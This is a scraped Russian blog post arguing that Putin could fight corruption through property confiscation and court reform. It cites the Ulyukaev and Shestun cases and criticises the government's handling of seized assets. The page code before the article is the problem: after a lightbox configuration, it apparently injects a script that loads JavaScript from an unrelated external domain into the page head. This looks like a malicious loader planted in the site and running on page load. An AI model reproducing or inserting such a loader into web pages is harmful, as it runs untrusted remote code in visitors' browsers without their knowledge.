, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Может ли Путин принимать решения в пользу большинства населения страны?

23 Апр

Размышления человека оценивавшего 18 лет работу Путина с позиций здравого смысла и права.

В России президентская власть остаётся по-прежнему самой сильной и уважаемой из существующих властей.

Путин знает не по наслышке о том, как жируют его назначенцы и бедствуют миллионы россиян имеющие  высшее образование и жизненный опыт.

Сложившаяся за последние годы вокруг России внешняя обстановка требовала от Путина принятия решений, направленных на защиту страны от внешних угроз, которая была успешно проведена. У нас самые быстрые ракеты, неуязвимые подлодки, и хорошо обученная армия.

На судостроительном заводе «Севмаш» спустили https://www.vesti.ru/doc.html?id=3140745&utm_source=yxnews&utm_medium=desktop   на воду первую субмарину-носитель подводных беспилотников «Посейдон».

Поэтому появилось  время и возможности обратить внимание на проблемы внутри страны.

Годами чиновники совместно с предпринимателями безнаказанно разворовывают бюджетные средства триллионами рублей. Поэтому в каждом регионе можно наблюдать  не только успешных предпринимателей, но и жирующих чиновников, живущих явно не на свои зарплаты.

От призывов борьбы с коррупцией, Путин перешёл к решительным мерам.

Для него борьба с коррупцией стала делом чести, которую готовы поддержать миллионы россиян.

Самое важное  Путин  осознал, что надо не наполнять УК новыми  статьями, а  «наказывать рублем». Зачем брать взятку, если не сможешь ее потратить?

В третьем чтении Госдума одобрила антикоррупционный закон https://xn-----7kcbekeiftdh9amwkb4d2o.xn--p1ai/gosduma-odobrila-antikorruptsionnyiy-zakon.html  Путина, который позволяет обеспечить неотвратимость наказания и отсутствие возможности потратить незаконным путем полученные деньги.

Под проверку будут попадать сделки, сумма которых превысит доход всей семьи госслужащего.

Некоторые бизнесмены также будут привлечены к ответственности. В первую очередь это будут тесно  сотрудничающие с государством и регулярно выигрывающие тендеры на различные виды деятельности.

Если  гражданин  не сможет доказать легальное происхождение средств на покупку, ему грозит реальный срок до трех лет лишения свободы с конфискацией всего имущества, даже приобретенного на законно заработанные деньги.

Намерения благие, но большие сомнения в их реализации. И, вот, почему.

Седьмой год действует п.п. 8 п. 2 статьи 235 ГК РФ, позволяющих лишать чиновников «сомнительной собственности», если они не докажут правомерность приобретения ею.

Эта норма была апробирована на бывшем губернаторе Хорошавине, а также главе Серпуховского района https://www.gazeta.ru/social/2019/04/08/12291547.shtml  Подмосковья Александре Шестуне. Решением суда  конфисковали имущества более, чем на 11 млрд рублей.

Но более широкого применения эта норма на практике не получила.

Более того, правительство оказалось  не готовым использовать конфискованное имущество надлежащим образом.

О неумелости работы правительства свидетельствуют и обнародованные факты https://russian.rt.com/business/news/579128-rosimuschestvo-konfiskaciya-auditory?utm_source=yxnews&utm_medium=desktop   Счетной палатой (СП).

«В 2017 году расходы на хранение составили 222 млн рублей, а доходы от реализации — 180 млн рублей».

«В первой половине текущего года Росимущество потратило на хранение конфиската 62 млн рублей при прибыли всего в 64 млн рублей.

На продажу направляется менее 1% изъятого имущества».

Как же Медведев может рапортовать о профессионализме министров и хорошей работе правительства, если из изъятого на 11 млрд рублей имущества, на продажу направится менее 1%?

А где и у кого осядет остальное?

Всё это даёт основания Путину отправить в отставку правительство, которое не может распорядиться тем, что конфисковали. Конечно, такое правительство не  могло нормально организовать проведение пенсионной реформы.

Действующее сегодня законодательство позволяет взяточника лишить всего имущества, даже приобретенного на законно заработанные деньги.

Но этого не делается на практике.

Так, бывший член  правительства, министр экономического развития Улюкаев, ни дня не работавший в бизнесе, обладал имуществом на миллиард рублей.

Приставы заморозили https://www.gazeta.ru/social/2019/02/14/12183253.shtml   счета экс-чиновника, на которых лежало более 67 млн рублей и $1,3 млн. Кроме того, силовики изъяли $250 тыс., 200 крон, 280 польских злотых, а также наличную валюту еще ряда стран.

Под арест также попали дом Улюкаева в Москве, недвижимость в Смоленской области, автомобиль, многочисленные монеты из драгоценных металлов, слиток серебра и дорогостоящие часы.

За взятку суд осудил Улюкаева на 8 лет лишения свободы и оштрафовал в однократном размере от суммы взятки, всего на 130 млн. руб., вернув взяточнику имущество почти на миллиард рублей. А мог оштрафовать в семидесятикратном размере полученной Улюкаевым взятки.

Дискредитировавший исполнительную власть чиновник отделался лёгким испугом и вскорости может досрочно освободиться от наказания и воспользоваться «непосильно нажитым».

В этой связи Путину надо решиться на установление в стране правосудия, как вида государственной деятельности, осуществляемой в особом порядке, установленном Конституцией и процессуальным законодательством.

Сделать это можно достаточно быстро и силами ста судей Верховного Суда РФ. Готов без какой-либо оплаты посодействовать этому.

Правосудие сделает помощником Путина миллионы россиян, которые начнут борьбу с незаконными и необоснованными действиями, бездействием и решениями органов власти и должностных лиц.

В России есть колоссальный запрос на новые лица и новую политическую силу.

Но за пять лет Путин способен установить в России власть Конституции, обеспеченную её гарантом и правосудием, став именно тем новым лицом, которого россияне давно ждут,  оставив о себе добрую память россиян.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.